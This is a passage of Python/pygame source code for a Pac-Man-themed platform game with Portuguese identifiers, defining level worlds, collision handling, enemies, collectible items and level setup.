self.rects_plataforma3:\r\n if direcao == 'L' and pygame.Rect(obj.rect.x-vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'R'and pygame.Rect(obj.rect.x+vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'D' and pygame.Rect(obj.rect.x, obj.rect.y+vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n obj.rect.bottom = rect.top\r\n self.sumir_plataforma3 = self.rects_plataforma3.index(rect)\r\n return True\r\n elif direcao == 'U'and pygame.Rect(obj.rect.x, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n\r\n if self.sumir_plataforma3 >= 0:\r\n self.tempo_plataforma3 += 1\r\n if self.tempo_plataforma3 > 7:\r\n self.rects_plataforma3.pop(self.sumir_plataforma3)\r\n self.sumir_plataforma3 = -1\r\n self.tempo_plataforma3 = 0\r\n return False\r\n\r\n def atualiza(self, parametro):\r\n for rect in self.rects:\r\n rect.move_ip(parametro,0)\r\n for rect in self.rects_plataforma3:\r\n rect.move_ip(parametro,0)\r\n \r\n def desenha(self, tela):\r\n \r\n tela.fill((0,0,0))\r\n tela.blit(pygame.transform.scale(background4,(655,555)),(-5,-5))\r\n\r\n for rect in self.rects_sup1:\r\n tela.blit(superficie1[0], rect)\r\n for rect in self.rects_sup2:\r\n tela.blit(superficie1[1], rect)\r\n for rect in self.rects_sup3:\r\n tela.blit(superficie1[2], rect)\r\n\r\n for rect in self.rects_plataforma:\r\n tela.blit(plataforma1_noite, rect)\r\n for rect in self.rects_plataforma1:\r\n tela.blit(plataforma_mundo4, rect)\r\n for rect in self.rects_plataforma2:\r\n tela.blit(plataforma2, rect)\r\n for rect in self.rects_plataforma3:\r\n tela.blit(plataforma3, rect)\r\n\r\nclass Mundo5():\r\n\r\n def __init__(self):\r\n self.rects_plataforma = [pygame.Rect(x,y,175,35) for x,y in ((50,350),(14674,350))]\r\n self.rects_plataforma1 = [pygame.Rect(x,y,35,35) for x,y in ((355,385),(520,420),(685,385),(850,420),(1015,385),(1180,420),(1345,385),(7145,392),(7310,392),(7475,392),(7640,392),(12432,385),(12467,420),(12632,455),(12797,455),(12962,455),(13127,420),(13162,385))]\r\n self.rects_plataforma2 = [pygame.Rect(x,y,45,45) for x,y in ((10147,385),(10282,385),(10417,385),(10552,385),(10687,385),(10822,385),(10957,385),(11092,385),(11227,385),(11362,385),(11497,385),(11632,385),(11767,385),(11902,385),(12037,385),(12172,385),(12262,385),(13799,385),(14149,455),(14499,385),(14979,350),(14324,420))]\r\n self.rects_plataforma3 = [pygame.Rect(x,y,45,45) for x,y in ((10192,385),(10237,385),(10327,385),(10372,385),(10462,385),(10507,385),(10597,385),(10642,385),(10732,385),(10777,385),(10867,385),(10912,385),(11002,385),(11047,385),(11137,385),(11182,385),(11272,385),(11317,385),(11407,385),(11452,385),(11542,385),(11587,385),(11677,385),(11722,385),(11812,385),(11857,385),(11947,385),(11992,385),(12082,385),(12127,385),(12217,385),(13974,420))]\r\n self.rects_sup1 = [pygame.Rect(x,550-superficie1[0].get_rect().h,175,73) for x in ((1510,1825,2140,2455,3200,3945,4690,5435,9487))]\r\n self.rects_sup2 = [pygame.Rect(x,550-superficie1[1].get_rect().h,210,143) for x in ((2630,2990,3375,3735,4120,4480,4865,5225,5750,6100,6450,6800,8147,8357,8567,8777,9277,9662))]\r\n self.rects_sup3 = [pygame.Rect(x,550-superficie1[2].get_rect().h,150,210) for x in ((2840,3585,4330,5075,7997,9127,9872,13519))]\r\n self.rects = self.rects_plataforma+self.rects_plataforma1+self.rects_plataforma2+self.rects_sup1+self.rects_sup2+self.rects_sup3\r\n self.tempo_plataforma3 = 0\r\n self.sumir_plataforma3 = -1\r\n \r\n def colisao(self, direcao, vel, obj):\r\n for rect in self.rects:\r\n if direcao == 'L' and pygame.Rect(obj.rect.x-vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'R'and pygame.Rect(obj.rect.x+vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'D' and pygame.Rect(obj.rect.x, obj.rect.y+vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n obj.rect.bottom = rect.top\r\n return True\r\n elif direcao == 'U'and pygame.Rect(obj.rect.x, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n\r\n for rect in self.rects_plataforma3:\r\n if direcao == 'L' and pygame.Rect(obj.rect.x-vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'R'and pygame.Rect(obj.rect.x+vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'D' and pygame.Rect(obj.rect.x, obj.rect.y+vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n obj.rect.bottom = rect.top\r\n self.sumir_plataforma3 = self.rects_plataforma3.index(rect)\r\n return True\r\n elif direcao == 'U'and pygame.Rect(obj.rect.x, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n\r\n if self.sumir_plataforma3 >= 0:\r\n self.tempo_plataforma3 += 1\r\n if self.tempo_plataforma3 > 7:\r\n self.rects_plataforma3.pop(self.sumir_plataforma3)\r\n self.sumir_plataforma3 = -1\r\n self.tempo_plataforma3 = 0\r\n return False\r\n\r\n def atualiza(self, parametro):\r\n for rect in self.rects:\r\n rect.move_ip(parametro,0)\r\n for rect in self.rects_plataforma3:\r\n rect.move_ip(parametro,0)\r\n \r\n def desenha(self, tela):\r\n \r\n tela.fill((0,0,0))\r\n tela.blit(pygame.transform.scale(background5A,(655,555)),(-5,-5))\r\n\r\n for rect in self.rects_sup1:\r\n tela.blit(superficie1[0], rect)\r\n for rect in self.rects_sup2:\r\n tela.blit(superficie1[1], rect)\r\n for rect in self.rects_sup3:\r\n tela.blit(superficie1[2], rect)\r\n\r\n for rect in self.rects_plataforma:\r\n tela.blit(plataforma1_noite, rect)\r\n for rect in self.rects_plataforma1:\r\n tela.blit(plataforma_mundo5, rect)\r\n for rect in self.rects_plataforma2:\r\n tela.blit(plataforma2, rect)\r\n for rect in self.rects_plataforma3:\r\n tela.blit(plataforma3, rect)\r\n\r\nclass Mundo_das_trevas():\r\n\r\n def __init__(self):\r\n self.rects_plataforma = []\r\n self.rects_plataforma1 = []\r\n self.rects_plataforma2 = [pygame.Rect(x,y,40,40) for x,y in ((10,450),(130,450),(250,450),(370,450),(490,450),(610,450))]\r\n self.rects_plataforma3 = [pygame.Rect(x,y,40,40) for x,y in ((70,450),(190,450),(310,450),(430,450),(550,450))]\r\n \r\n self.rects = self.rects_plataforma+self.rects_plataforma1+self.rects_plataforma2\r\n self.tempo_plataforma3 = 0\r\n self.sumir_plataforma3 = -1\r\n\r\n def aparecer_plataformas(self):\r\n self.rects_plataforma = [pygame.Rect(50,320,175,35)]\r\n self.rects_plataforma1 = [pygame.Rect(x,y,35,35) for x,y in ((315,320),(460,355))]\r\n self.rects_plataforma2 = [pygame.Rect(x,y,40,40) for x,y in ((10,450),(130,450),(250,450),(370,450),(490,450),(610,450), (70,450),(190,450),(310,450),(430,450),(550,450))]\r\n self.rects = self.rects_plataforma+self.rects_plataforma1+self.rects_plataforma2\r\n \r\n def colisao(self, direcao, vel, obj):\r\n for rect in self.rects:\r\n if direcao == 'L' and pygame.Rect(obj.rect.x-vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'R'and pygame.Rect(obj.rect.x+vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'D' and pygame.Rect(obj.rect.x, obj.rect.y+vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n obj.rect.bottom = rect.top\r\n return True\r\n elif direcao == 'U'and pygame.Rect(obj.rect.x, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n\r\n for rect in self.rects_plataforma3:\r\n if direcao == 'L' and pygame.Rect(obj.rect.x-vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'R'and pygame.Rect(obj.rect.x+vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'D' and pygame.Rect(obj.rect.x, obj.rect.y+vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n obj.rect.bottom = rect.top\r\n self.sumir_plataforma3 = self.rects_plataforma3.index(rect)\r\n return True\r\n elif direcao == 'U'and pygame.Rect(obj.rect.x, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n\r\n if self.sumir_plataforma3 >= 0:\r\n self.tempo_plataforma3 += 1\r\n if self.tempo_plataforma3 > 7:\r\n self.rects_plataforma3.pop(self.sumir_plataforma3)\r\n self.sumir_plataforma3 = -1\r\n self.tempo_plataforma3 = 0\r\n return False\r\n\r\n def desenha(self, tela):\r\n \r\n tela.fill((0,0,0))\r\n tela.blit(pygame.transform.scale(background5B,(655,555)),(-5,-5))\r\n\r\n for rect in self.rects_plataforma:\r\n tela.blit(plataforma1_noite, rect)\r\n for rect in self.rects_plataforma1:\r\n tela.blit(plataforma_mundo5, rect)\r\n for rect in self.rects_plataforma3:\r\n tela.blit(plataforma3_mt, rect)\r\n for rect in self.rects_plataforma2:\r\n tela.blit(plataforma2_mt, rect)\r\n\r\nclass Mundo_zeramento():\r\n\r\n def __init__(self):\r\n self.rects_plataforma = [pygame.Rect(x,320,175,35) for x in (50,225,400,575,750,1025,1200)]\r\n self.rects = self.rects_plataforma\r\n\r\n self.x_nuvens = [655, 855, 1155]\r\n\r\n def aparecer_plataformas(self):\r\n pass\r\n \r\n def colisao(self, direcao, vel, obj):\r\n for rect in self.rects:\r\n if direcao == 'L' and pygame.Rect(obj.rect.x-vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'R'and pygame.Rect(obj.rect.x+vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n elif direcao == 'D' and pygame.Rect(obj.rect.x, obj.rect.y+vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n obj.rect.bottom = rect.top\r\n return True\r\n elif direcao == 'U'and pygame.Rect(obj.rect.x, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(rect):\r\n return True\r\n return False\r\n\r\n def atualiza(self, parametro):\r\n for rect in self.rects:\r\n rect.move_ip(parametro,0)\r\n\r\n def desenha(self, tela):\r\n \r\n tela.fill((0,0,0))\r\n tela.blit(pygame.transform.scale(background_zeramento,(655,555)),(-5,-5))\r\n\r\n self.x_nuvens[0] -= 1\r\n if self.x_nuvens[0] < -73:\r\n self.x_nuvens[0] = 655\r\n self.x_nuvens[1] -= 1\r\n if self.x_nuvens[1] < -150:\r\n self.x_nuvens[1] = 855\r\n self.x_nuvens[2] -= 1\r\n if self.x_nuvens[2] < -108:\r\n self.x_nuvens[2] = 1155\r\n\r\n tela.blit(nuvens[0], (self.x_nuvens[0],105))\r\n tela.blit(nuvens[1], (self.x_nuvens[1],205))\r\n tela.blit(nuvens[2], (self.x_nuvens[2],85))\r\n\r\n for rect in self.rects_plataforma:\r\n tela.blit(plataforma1, rect)\r\n \r\nclass Passagem():\r\n\r\n def __init__(self,x,y):\r\n self.rect = pygame.Rect(x,y,46,44)\r\n self.aberta = False\r\n\r\n def abre(self):\r\n self.aberta = True\r\n\r\n def esta_aberta(self):\r\n return self.aberta\r\n\r\n def atualiza(self,parametro):\r\n self.rect.move_ip(parametro,0)\r\n\r\n def dentro(self,rect):\r\n if rect.top > self.rect.top and rect.bottom < self.rect.bottom and rect.right < self.rect.right+10 and rect.left+10 > self.rect.left:\r\n return True\r\n \r\n def desenha(self,tela, passagem_especial = 0):\r\n tela.blit(passagem[self.aberta] if not passagem_especial else passagem2[self.aberta],self.rect)\r\n\r\nclass Chave():\r\n\r\n def __init__(self,x,y):\r\n self.rect = pygame.Rect(x,y,42,25)\r\n self.sumir = False\r\n\r\n def atualiza(self,parametro):\r\n self.rect.move_ip(parametro,0)\r\n\r\n def desenha(self,tela,chave_especial = 0):\r\n tela.blit(chave if not chave_especial else chave2,self.rect)\r\n \r\nclass Bola1():\r\n\r\n def __init__(self,x,y):\r\n self.rect = pygame.Rect(x,y,12,12)\r\n\r\n def atualiza(self,parametro):\r\n self.rect.move_ip(parametro,0)\r\n\r\n def get_rect(self):\r\n return self.rect\r\n\r\n def desenha(self,tela):\r\n tela.blit(bola1, self.rect)\r\n\r\nclass Maca():\r\n\r\n def __init__(self,x,y):\r\n self.rect = pygame.Rect(x,y,23,25)\r\n\r\n def atualiza(self,parametro):\r\n self.rect.move_ip(parametro,0)\r\n\r\n def get_rect(self):\r\n return self.rect\r\n\r\n def desenha(self,tela):\r\n tela.blit(maca_img,self.rect)\r\n\r\nclass Pera():\r\n\r\n def __init__(self,x,y):\r\n self.rect = pygame.Rect(x,y,18,27)\r\n\r\n def atualiza(self,parametro):\r\n self.rect.move_ip(parametro,0)\r\n\r\n def get_rect(self):\r\n return self.rect\r\n\r\n def desenha(self,tela):\r\n tela.blit(pera_img,self.rect)\r\n\r\nclass Plataforma_movel():\r\n\r\n def __init__(self,x,y):\r\n self.rect = pygame.Rect(x,y,82,14)\r\n\r\n def move(self):\r\n if self.rect.y > 280:\r\n self.rect.y -= 4\r\n\r\n def atualiza(self, parametro):\r\n self.rect.move_ip(parametro,0)\r\n\r\n def colisao(self, direcao, vel, obj):\r\n if direcao == 'L' and pygame.Rect(obj.rect.x-vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(self.rect):\r\n return True\r\n if direcao == 'R'and pygame.Rect(obj.rect.x+vel, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(self.rect):\r\n return True\r\n if direcao == 'D' and pygame.Rect(obj.rect.x, obj.rect.y+vel, obj.rect.w,obj.rect.h-vel).colliderect(self.rect):\r\n obj.rect.bottom = self.rect.top\r\n return True\r\n if direcao == 'U'and pygame.Rect(obj.rect.x, obj.rect.y-vel, obj.rect.w,obj.rect.h-2).colliderect(self.rect):\r\n return True\r\n return False\r\n\r\n def desenha(self, tela):\r\n tela.blit(plataforma_movel1, self.rect)\r\n \r\nclass Fantasma1():\r\n \r\n def __init__(self,cor,x,y,direcao):\r\n self.rect = pygame.Rect(x,y,40,40)\r\n self.cor = cor\r\n self.cor_inicial = cor\r\n self.direcao = direcao\r\n self.x_inicial = x\r\n self.y_inicial = y\r\n self.sentido = [\"R\",\"L\"][randint(0,1)] if self.direcao == \"horizontal\" else [\"U\",\"D\"][randint(0,1)]\r\n self.tempo_medo = 0\r\n self.medo = False\r\n\r\n def atualiza(self, parametro):\r\n self.rect.move_ip(parametro,0)\r\n self.x_inicial += parametro \r\n\r\n def set_medo(self):\r\n self.cor = 3\r\n self.medo = True\r\n\r\n def muda_estado(self):\r\n if self.medo:\r\n self.tempo_medo += 1\r\n if self.tempo_medo > 180:\r\n self.medo = False\r\n self.cor = self.cor_inicial\r\n self.tempo_medo = 0\r\n\r\n def move(self, mundo):\r\n if self.sentido == \"R\":\r\n self.rect.x += 2\r\n if (self.rect.x - self.x_inicial > 180) or mundo.colisao(\"R\",2,self):\r\n self.sentido = \"L\"\r\n\r\n elif self.sentido == \"L\":\r\n self.rect.x -= 2\r\n if (abs(self.rect.x - self.x_inicial) > 180) or mundo.colisao(\"L\",2,self):\r\n self.sentido = \"R\"\r\n\r\n elif self.sentido == \"U\":\r\n self.rect.y -= 2\r\n if (abs(self.rect.y - self.y_inicial) > 50) or mundo.colisao(\"U\",2,self):\r\n self.sentido = \"D\"\r\n\r\n elif self.sentido == \"D\":\r\n self.rect.y += 2\r\n if (self.rect.y - self.y_inicial > 50) or mundo.colisao(\"D\",2,self):\r\n self.sentido = \"U\"\r\n\r\n def desenha(self, tela):\r\n if self.direcao == \"horizontal\":\r\n tela.blit(fantasma1[self.sentido][self.cor],self.rect)\r\n else:\r\n tela.blit(fantasma1[\"R\"][self.cor],self.rect)\r\n\r\nclass Fantasma2():\r\n\r\n def __init__(self,x,y):\r\n self.rect = pygame.Rect(x,y,47,48)\r\n self.sentido1 = 'L' if self.rect.x > 650/2 else 'R'\r\n self.sentido2 = ['U','D'][randint(0,1)]\r\n self.ind = 0\r\n self.animacao = 0\r\n self.inativo1 = 0\r\n self.inativo2 = 0\r\n self.tempo_inativo1 = 0\r\n self.tempo_inativo2 = 0\r\n self.yi = self.rect.y\r\n\r\n def atualiza(self,parametro):\r\n self.rect.move_ip(parametro,0)\r\n\r\n def move(self):\r\n if self.sentido1 == 'L':\r\n self.rect.x -= 3\r\n if self.rect.x < -400:\r\n self.sentido1 = 'R'\r\n\r\n if self.sentido1 == 'R':\r\n self.rect.x += 3\r\n if self.rect.x > 1050:\r\n self.sentido1 = 'L'\r\n\r\n if self.sentido2 == 'U':\r\n self.rect.y -= 2\r\n if abs(self.rect.y-self.yi) > 20:\r\n self.sentido2 = 'D'\r\n\r\n if self.sentido2 == 'D':\r\n self.rect.y += 2\r\n if abs(self.rect.y-self.yi) > 20:\r\n self.sentido2 = 'U'\r\n\r\n def set_medo1(self):\r\n self.inativo1 = True\r\n\r\n def set_medo2(self):\r\n self.inativo2 = True\r\n\r\n def muda_estado(self):\r\n if self.inativo1:\r\n self.tempo_inativo1 += 1\r\n if self.tempo_inativo1 > 200:\r\n self.inativo1 = False\r\n self.tempo_inativo1 = 0\r\n\r\n if self.inativo2:\r\n self.tempo_inativo2 += 1\r\n if self.tempo_inativo2 > 400:\r\n self.inativo2 = False\r\n self.tempo_inativo2 = 0\r\n\r\n def desenha(self,tela):\r\n if not self.inativo2:\r\n if self.animacao < 10:\r\n self.animacao += 1\r\n else:\r\n self.animacao = 0\r\n if self.animacao == 10:\r\n self.ind += 1\r\n if self.ind > 1:\r\n self.ind = 0\r\n tela.blit(fantasma2[self.ind+self.inativo1*2] if not self.inativo2 else fantasma2[4],self.rect)\r\n \r\n\r\nclass Tiro():\r\n\r\n def __init__(self,x,y,direcao):\r\n self.rect = pygame.Rect(x,y,14,14)\r\n self.velocidade = 20\r\n self.direcao = direcao\r\n \r\n def move(self):\r\n if self.direcao == 'R':\r\n self.rect.move_ip(self.velocidade, 0)\r\n else:\r\n self.rect.move_ip(-self.velocidade, 0)\r\n\r\n if self.velocidade > 7:\r\n self.velocidade -= 1\r\n\r\n def destroi(self, rect):\r\n return self.rect.colliderect(rect)\r\n\r\n def colide(self, rect):\r\n return self.rect.colliderect(rect) or self.rect.x > 650-self.rect.w or self.rect.x < 5\r\n\r\n def desenha(self, tela):\r\n tela.blit(pygame.transform.scale(maca_img,(14,14)), self.rect)\r\n\r\nclass Evil_tiro():\r\n\r\n def __init__(self,x,y,direcao):\r\n self.rect = pygame.Rect(x,y,14,14)\r\n self.velocidade = 20\r\n self.direcao = direcao\r\n \r\n def move(self):\r\n if self.direcao == 'R':\r\n self.rect.move_ip(self.velocidade, 0)\r\n else:\r\n self.rect.move_ip(-self.velocidade, 0)\r\n\r\n if self.velocidade > 7:\r\n self.velocidade -= 1\r\n\r\n def destroi(self, rect):\r\n return self.rect.colliderect(rect)\r\n\r\n def colide(self, rect):\r\n return self.rect.colliderect(rect) or self.rect.x > 650-self.rect.w or self.rect.x < 5\r\n\r\n def desenha(self, tela):\r\n tela.blit(evil_maca_img, self.rect)\r\n\r\n\r\nclass Pacman():\r\n\r\n def __init__(self, x, y):\r\n self.direcao = 'R'\r\n self.vel_pulo = 15\r\n self.rect = pygame.Rect(x,y,40,40)\r\n self.pulou = False\r\n self.vel_meche_boca = 0\r\n self.ind = 0\r\n self.ind2 = 0\r\n\r\n def move(self):\r\n if self.direcao == 'R':\r\n self.rect.x += 3\r\n elif self.direcao == 'L':\r\n self.rect.x -= 3\r\n\r\n if self.rect.x < 0:\r\n self.rect.x = 0\r\n\r\n def atualiza(self, direcao):\r\n self.direcao = direcao\r\n\r\n def pula(self):\r\n if self.direcao in 'RL':\r\n self.rect.move_ip(0, -self.vel_pulo)\r\n self.vel_pulo -= .5\r\n\r\n def colide(self,rect):\r\n if(rect.x+rect.w-5) > self.rect.x and rect.x < (self.rect.x + self.rect.w-5) and (rect.y + rect.h-5) > self.rect.y and rect.y < (self.rect.y + self.rect.h-5):\r\n return True\r\n\r\n def captura_item(self,itens):\r\n for item in itens:\r\n if (item.get_rect().x+item.get_rect().w-20) > self.rect.x and item.get_rect().x < (self.rect.x + self.rect.w-20) and (item.get_rect().y + item.get_rect().h) > self.rect.y and item.get_rect().y < (self.rect.y + self.rect.h):\r\n itens.remove(item)\r\n return True\r\n\r\n def get_rect(self):\r\n return self.rect\r\n\r\n def destruicao(self):\r\n self.direcao = 'D'\r\n if self.vel_meche_boca < 10:\r\n self.vel_meche_boca += 1\r\n else:\r\n self.vel_meche_boca = 0\r\n\r\n if self.vel_meche_boca == 10:\r\n if self.ind2 < 4:\r\n self.ind2 += 1\r\n else:\r\n toca_som(\"pacman_death.wav\")\r\n pygame.time.wait(1500)\r\n return True\r\n\r\n def desenha(self, tela):\r\n if self.direcao in 'RL':\r\n if self.vel_meche_boca < 5:\r\n self.vel_meche_boca += 1\r\n else:\r\n self.vel_meche_boca = 0\r\n\r\n if self.vel_meche_boca == 5:\r\n if self.ind < 3:\r\n self.ind += 1\r\n else:\r\n self.ind = 0\r\n \r\n \r\n tela.blit(pacman[self.direcao][self.ind if self.direcao != 'D' else self.ind2], self.rect)\r\n\r\nclass Pacwoman():\r\n\r\n def __init__(self, x, y):\r\n self.rect = pygame.Rect(x,y,40,40)\r\n self.ind = 0\r\n self.emocao = 0\r\n self.vel_meche_boca = 0\r\n\r\n def atualiza(self, parametro):\r\n self.rect.move_ip(parametro,0)\r\n\r\n def get_rect(self):\r\n return self.rect\r\n\r\n def emociona(self):\r\n self.emocao = True\r\n\r\n def desenha(self, tela):\r\n if self.vel_meche_boca < 5:\r\n self.vel_meche_boca += 1\r\n else:\r\n self.vel_meche_boca = 0\r\n\r\n if self.vel_meche_boca == 5:\r\n if self.ind < 3:\r\n self.ind += 1\r\n else:\r\n self.ind = 0\r\n\r\n tela.blit(pacwoman[self.ind],self.rect)\r\n tela.blit(laco_pacwoman, (self.rect.x+5, self.rect.y-12))\r\n if self.emocao:\r\n tela.blit(emocao_pacwoman, (self.rect.x+40,230))\r\n\r\n\r\nclass Evil_pacman():\r\n\r\n def __init__(self, x, y):\r\n self.direcao = 'L'\r\n self.vel_pulo = 15\r\n self.rect = pygame.Rect(x,y,40,40)\r\n self.tempo_medo = 0\r\n self.vel_meche_boca = 0\r\n self.estado = 'A'\r\n self.ind = 0\r\n self.medo = False\r\n self.atirar = False\r\n\r\n def move(self):\r\n if self.direcao == 'R':\r\n self.rect.x += 3\r\n if self.rect.left > 650:\r\n self.direcao = 'L'\r\n elif self.direcao == 'L':\r\n self.rect.x -= 3\r\n if self.rect.right < 0:\r\n self.direcao = 'R'\r\n\r\n if self.direcao == 'R':\r\n if self.rect.right > 0 and self.rect.x < 450:\r\n self.atirar = True\r\n else:\r\n self.atirar = False\r\n elif self.direcao == 'L':\r\n if self.rect.left < 650 and self.rect.x > 200:\r\n self.atirar = True\r\n else:\r\n self.atirar = False\r\n\r\n def atira(self):\r\n return self.atirar\r\n\r\n def set_medo(self):\r\n self.estado = 'B'\r\n self.medo = True\r\n\r\n def muda_estado(self):\r\n if self.medo:\r\n self.tempo_medo += 1\r\n if self.tempo_medo > 300:\r\n self.medo = False\r\n self.estado = 'A'\r\n self.tempo_medo = 0\r\n\r\n def pula(self):\r\n self.rect.move_ip(0, -self.vel_pulo)\r\n self.vel_pulo -= .5\r\n\r\n def get_rect(self):\r\n return self.rect\r\n\r\n def desenha(self, tela, vidas):\r\n if self.direcao in 'RL':\r\n if self.vel_meche_boca < 5:\r\n self.vel_meche_boca += 1\r\n else:\r\n self.vel_meche_boca = 0\r\n\r\n if self.vel_meche_boca == 5:\r\n if self.ind < 3:\r\n self.ind += 1\r\n else:\r\n self.ind = 0\r\n \r\n \r\n tela.blit(evil_pacman[self.estado][self.direcao][self.ind], self.rect)\r\n tela.blit(evil_vidas_icone,[160,35])\r\n tela.blit(fonte[0].render(\"x\", True, (223,203,194)), [185,33])\r\n tela.blit(fonte[1].render(str(vidas), True, (223,203,194)), [200,34])\r\n\r\nclass Jogo():\r\n\r\n def __init__(self, fase = 1):\r\n self.tecla_pulo = 0\r\n self.acionou_pulo = False\r\n self.acionou_pulo_evil_pacman = False\r\n self.quant_tiros = 0\r\n self.tiro_jogador = 0\r\n self.tiro_evil_pacman = 0\r\n self.medo_fantasma = False\r\n self.pontuacao = 0\r\n self.chave_capturada = False\r\n self.vidas_jogador = 5\r\n self.vidas_evil_pacman = 5\r\n self.fase = fase\r\n self.bolas_capturadas = 0\r\n self.tempo_nova_fase = 0\r\n self.novo_recorde = 0\r\n self.pisca_barra = 0\r\n self.sair = 0\r\n\r\n\r\n def __init2__(self,teclas,tocar_som = True):\r\n self.teclas = teclas\r\n self.estado_jogo = 'IN'\r\n self.nome_jogador = \"\"\r\n self.tocar_som = tocar_som\r\n\r\n def init_fase1(self):\r\n self.atualizar_tela = 0\r\n self.mundo = Mundo1()\r\n self.plataforma_movel = [Plataforma_movel(3192,442)]\r\n self.bolas = [Bola1(x,y) for x,y in ((1090,320),(1150,320),(3662,320),(3722,320),(3812,320),(3872,320))]\r\n for pos in (365,575,880,1245,1895,2105,3967):\r\n self.bolas.extend([Bola1(pos+60*i,387) for i in range(3)])\r\n for pos in (1452,1627,4174,4349,4524):\r\n self.bolas.extend([Bola1(pos+50*i,457) for i in range(3)])\r\n\r\n self.fantasmas = [Fantasma1(2,515,368,\"horizontal\"),Fantasma1(1,925,368,\"horizontal\"),Fantasma1(0,1560,437,\"horizontal\"),\r\n Fantasma1(1,2055,368,\"horizontal\"), Fantasma1(2,3757,300,\"horizontal\"),Fantasma1(1,4292,437,\"horizontal\"),\r\n Fantasma1(0,4467,437,\"horizontal\"),Fantasma1(0,2452,352,\"vertical\"),Fantasma1(2,2727,352,\"vertical\"),\r\n Fantasma1(1,3002,352,\"vertical\")]\r\n\r\n self.macas = [Maca(4700, 260),Maca(1116, 260),Maca(2460,310),Maca(3690,260),Maca(3840,260)]\r\n \r\n self.peras = [Pera(2590,305),Pera(2870,305),Pera(4379,325)]\r\n \r\n self.pacman = Pacman(120, 120)\r\n\r\n self.passagem = Passagem(3416,307)\r\n\r\n self.chave = Chave(4828,310)\r\n\r\n self.destruicao_pacman = False\r\n\r\n def init_fase2(self):\r\n self.atualizar_tela = 0\r\n self.mundo = Mundo2()\r\n self.plataforma_movel = [Plataforma_movel(4015,442),Plataforma_movel(5922,442)]\r\n self.bolas = [Bola1(x,y) for x,y in ((1305,320),(1365,320),(4222,320),(4282,320),(4492,320),(4552,320),(5457,320),(5517,320))]\r\n for pos in (498,673,1988,2613):\r\n self.bolas.extend([Bola1(pos+50*i,457) for i in range(3)])\r\n for pos in (977,1457,1667,2293,4644,5244):\r\n self.bolas.extend([Bola1(pos+60*i,387) for i in range(3)])\r\n\r\n self.fantasmas = [Fantasma1(2, 645,430,\"horizontal\"),Fantasma1(0,1045,370,\"horizontal\"),\r\n Fantasma1(1,1525,370,\"horizontal\"),Fantasma1(2,1735,370,\"horizontal\"),\r\n Fantasma1(2,2360,370,\"horizontal\"),Fantasma1(0,2673,430,\"horizontal\"),Fantasma1(1,4712,370,\"horizontal\"),\r\n Fantasma1(2,5317,370,\"horizontal\"),Fantasma1(0,2929,308,\"vertical\"),Fantasma1(1,3189,343,\"vertical\"),\r\n Fantasma1(2,3450,378,\"vertical\"),Fantasma1(1,3833,343,\"vertical\")]\r\n\r\n self.macas = [Maca(1332,260),Maca(3652, 342),Maca(4250,260),Maca(4520,260),Maca(5479,260)]\r\n \r\n self.peras = [Pera(3071,260),Pera(3331,310),Pera(3571,347)]\r\n \r\n self.pacman = Pacman(120, 120)\r\n\r\n self.passagem = Passagem(4991,333)\r\n\r\n self.chave = Chave(6095,275)\r\n\r\n self.destruicao_pacman = False\r\n\r\n def init_fase3(self):\r\n self.atualizar_tela = 0\r\n self.mundo = Mundo3()\r\n self.plataforma_movel = [Plataforma_movel(3575,442),Plataforma_movel(7137,442)]\r\n self.bolas = [Bola1(x,y) for x,y in ((730,320),(790,320),(3792,320),(3852,320),(4537,320),(4597,320),(6922,320),(6982,320))]\r\n for pos in (1083,1258,1643,1818,4145):\r\n self.bolas.extend([Bola1(pos+50*i,457) for i in range(3)])\r\n for pos in (392,882,1442,3944,4329,4819,5159,5499):\r\n self.bolas.extend([Bola1(pos+60*i,387) for i in range(3)])\r\n\r\n self.fantasmas = [Fantasma1(2, 460,368,\"horizontal\"),Fantasma1(0,950,368,\"horizontal\"),\r\n Fantasma1(1,1230,437,\"horizontal\"),Fantasma1(1,1510,368,\"horizontal\"),\r\n Fantasma1(2,1790,437,\"horizontal\"),Fantasma1(1,4012,368,\"horizontal\"),\r\n Fantasma1(2,4397,368,\"horizontal\"),Fantasma1(0,4205,437,\"horizontal\"),Fantasma1(1,4887,368,\"horizontal\"),\r\n Fantasma1(2,5192,368,\"horizontal\"),Fantasma1(1,5262,368,\"horizontal\"),\r\n Fantasma1(0,5567,368,\"horizontal\"),\r\n Fantasma1(0,2126,357,\"vertical\"),Fantasma1(1,2516,350,\"vertical\"),\r\n 